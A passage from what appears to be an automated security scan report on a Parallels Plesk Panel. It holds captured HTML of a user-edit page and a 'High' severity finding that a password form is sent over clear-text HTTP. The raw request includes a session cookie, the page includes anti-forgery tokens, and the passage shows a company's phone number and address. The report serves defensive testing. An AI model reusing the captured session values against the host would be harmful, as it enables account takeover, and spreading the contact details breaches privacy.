$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-vcard-contactName'>Hoyt LLC Research</span>

</div>
</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="h02332" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="h02332@gmail.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId" disabled="1">
<option value="5" label="Owner" selected="selected">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-login'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-login'>xsscx</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='general-account-language-form-row' class='form-row' >
<div class='field-name'><label for='general-account-language'>Panel language&nbsp;</label></div>
<div class='field-value'>

<select name="general[account][language]" id="general-account-language">
<option value="en-US" label="ENGLISH (United States)" selected="selected">ENGLISH (United States)</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" disabled="disabled" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="Hoyt LLC Research" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="+1 339 206 1886" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80">PO BOX 250
</textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="Accord" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="MA" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="02018" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="Åland Islands">Åland Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.12. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/3

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/3

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET /smb/user/edit/id/3 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:51:20 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:51:20 GMT
Connection: close
Content-Length: 45474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>format-1 - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F3' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
